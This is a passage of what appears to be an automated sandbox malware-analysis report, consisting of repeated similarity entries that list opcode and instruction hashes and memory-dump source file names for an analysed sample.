                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          • Opcode Fuzzy Hash: 1282cab703eeac1e9578f0127b6602475737b1033e048c79e3d2e272b98d865c
                                                                                                                                                          • Instruction Fuzzy Hash: 83E0E5B4D00229EFCB44EFA8D941AAEBBF5FB08301F1085AAD814A3300E7719A51DF90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e7338899a11c9b863d3a2105edaa3e50fd5f44bc3b7005f7a9ef2a8a7ffe7847
                                                                                                                                                          • Instruction ID: 07ef19d2ccf11a3dd5e35fbbbdde47374f141c45bc9752a0564ecad89c34e95b
                                                                                                                                                          • Opcode Fuzzy Hash: e7338899a11c9b863d3a2105edaa3e50fd5f44bc3b7005f7a9ef2a8a7ffe7847
                                                                                                                                                          • Instruction Fuzzy Hash: 59E039B0D00219DFCB44DFA8C9006ADBBF2FB08311F1085AED414A2310D7714640CF80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 336ff18a43fa6120db93cfcc55e4ebab29f2557c2150ad37383550cead10c145
                                                                                                                                                          • Instruction ID: 87dbf4987ada27f420ef5e183ce02b859af48dc9229e7948021c2b8adedf905f
                                                                                                                                                          • Opcode Fuzzy Hash: 336ff18a43fa6120db93cfcc55e4ebab29f2557c2150ad37383550cead10c145
                                                                                                                                                          • Instruction Fuzzy Hash: 2BE0C2B058A348EFC347DBB9A8006593B399B43255F0500EEE444472D3D6715E08DBA1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 045e63e7693bcaa2d937e4050a3034bee6f5cfd0b6cb9d2d823b7d843b629e18
                                                                                                                                                          • Instruction ID: 48fd9b0036da921ed79f04416ea88bdb4bdb749ffffa61e91d490bb4fb3c52de
                                                                                                                                                          • Opcode Fuzzy Hash: 045e63e7693bcaa2d937e4050a3034bee6f5cfd0b6cb9d2d823b7d843b629e18
                                                                                                                                                          • Instruction Fuzzy Hash: FDE09A74E10208DFCB80DFA9D445A9CBBF4EB08715F1080EAD818D7750E6359A40CF41
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7d4439fae5a0fca25175483c2d74eb62d18866e01ca513c5c9b0141230e386c8
                                                                                                                                                          • Instruction ID: 15c74058505f3a62316a1da828bdaa76b35e9712143b4e5d4bd49269d7b115a2
                                                                                                                                                          • Opcode Fuzzy Hash: 7d4439fae5a0fca25175483c2d74eb62d18866e01ca513c5c9b0141230e386c8
                                                                                                                                                          • Instruction Fuzzy Hash: C6E08CB4408219DFCB45DFA1C04A9BE7FB6FF8A306F1094A4E55A5A216CB35C482CF40
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b282eea398078216b351b9274640d4f238ec503c44a704563b45ccc84c008a0d
                                                                                                                                                          • Instruction ID: 1ad33865c8f1c2e1983db5130302deda96dbc0f70dc5dcb9db7fa002d6d63804
                                                                                                                                                          • Opcode Fuzzy Hash: b282eea398078216b351b9274640d4f238ec503c44a704563b45ccc84c008a0d
                                                                                                                                                          • Instruction Fuzzy Hash: 70E0123A701314CFC715DF69E5444D4BB71FF85356B5005A9E51587362CB32DA50CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b0654b457e7e39f3be9420cb5e3957fb5451ab71a594e8d93e7598cf6e2fc13d
                                                                                                                                                          • Instruction ID: 2f6a31352850ab91ff83cc05a43544f5303555e67eabf6d918f6847e899ec58f
                                                                                                                                                          • Opcode Fuzzy Hash: b0654b457e7e39f3be9420cb5e3957fb5451ab71a594e8d93e7598cf6e2fc13d
                                                                                                                                                          • Instruction Fuzzy Hash: 36E0B670E15219EFDB44DFA8A65539CBBF5AB48215F1081AA9818E2350EA390A04CF40
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 85331d370931a167ad8665cd259a0b855945eff8609e5812320f45d8f396adf2
                                                                                                                                                          • Instruction ID: 105a983f7b21b284a28202c99a4ca045b4ccac339a1e291b7a28d009c484827e
                                                                                                                                                          • Opcode Fuzzy Hash: 85331d370931a167ad8665cd259a0b855945eff8609e5812320f45d8f396adf2
                                                                                                                                                          • Instruction Fuzzy Hash: 26E0B6B0D4021ADFDB80EFB9C909A5EBBF0BF08700F1189A9D019E7265E7749A058F91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 23d1e9c0f315c78d05aa66c6081818c61fdce89bd60bc017cee34d58100b0710
                                                                                                                                                          • Instruction ID: d304c6d4a715999b86ddbbc938b3471656dbad3ff7de6b89091378122bbcd865
                                                                                                                                                          • Opcode Fuzzy Hash: 23d1e9c0f315c78d05aa66c6081818c61fdce89bd60bc017cee34d58100b0710
                                                                                                                                                          • Instruction Fuzzy Hash: 9CE0EC70D0021DEFCB40EFF9E54679DBBF4AB04205F0080A99818E3350EA345B04CF91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b758a8c93a6715bd739993ab2c40a50bef8358d95b1699c9717b1726dd0b4afc
                                                                                                                                                          • Instruction ID: 7b137311e1d1c29cfab967a4010e5c1f635e7cbc43f0b8702315302cf9ef37d6
                                                                                                                                                          • Opcode Fuzzy Hash: b758a8c93a6715bd739993ab2c40a50bef8358d95b1699c9717b1726dd0b4afc
                                                                                                                                                          • Instruction Fuzzy Hash: CDE09275901628CFCB60CFB9D84069CB7B6BF89315F648269D819E735AE7309941CF00
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6b230cb07f5d3694cd765b5e3ccef6e6e1525504317a1fe4268a6663212b9c12
                                                                                                                                                          • Instruction ID: 6bba9e68c50cfd7d1c0d0bea20b76e3b9657c2f835b4ce146f2143653c820e1a
                                                                                                                                                          • Opcode Fuzzy Hash: 6b230cb07f5d3694cd765b5e3ccef6e6e1525504317a1fe4268a6663212b9c12
                                                                                                                                                          • Instruction Fuzzy Hash: EAE08670940255DFD790DF6DC504B4EBFF0AF04329F25C699D425DB6A6D73945068F40
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3f217c5cc7027ddc75d4fded15a5c55af9b2fcf5cc3baac0214cb1c07b3c8881
                                                                                                                                                          • Instruction ID: f5c69de174ca75bf392f851485484c2e45fe4314ffd292aa4e7dc9e4b3e4df9e
                                                                                                                                                          • Opcode Fuzzy Hash: 3f217c5cc7027ddc75d4fded15a5c55af9b2fcf5cc3baac0214cb1c07b3c8881
                                                                                                                                                          • Instruction Fuzzy Hash: B6D0A970A1121DDBCB40FBB8EA0679DBBB89B00206F1041B8880893260EA311F04DB91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd